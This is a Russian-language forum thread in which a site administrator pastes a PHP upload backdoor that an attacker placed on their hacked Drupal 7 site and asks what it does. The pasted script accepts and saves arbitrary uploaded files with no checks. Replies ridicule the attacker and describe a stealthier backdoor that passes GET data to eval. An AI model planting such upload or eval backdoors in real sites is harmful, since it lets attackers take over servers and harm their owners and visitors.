Здравствуйте, уважаемые профессионалы и любители РНР. Так уж получилось, что по непонятным причинам сайт на моей новой работе оказался взломан. Хакер сменил логин и пароль, а также создал страницу силами CMS Drupal 7, на которой разместил этот код Код (Text): <?php echo '<center><font color="Red" size="4">'; /// Script Upload By Osamaa kaboo \\\ if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo"<center><b>Done ==> $userfile_name</b></center>"; } } else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?> Хочется узнать, что делает этот код. Заранее спасибо
Измельчал хацкер, поглупел, стал делать странички через рульки CMS для заливки зловредов, эхехе. В мое время куда-то в проект кидался скриптик, который принимал GET с определенным ключом, после чего остальные данные в GET-е прокручивал через EVAL. Тихо, без пыли, без засветов в админке.
Не иначе. Ты глянь на этот стыд: Красненький шрифтик и кричалка с ником. Мол "эй, эй, это я! Вот он я! Я великий!" Тьфу...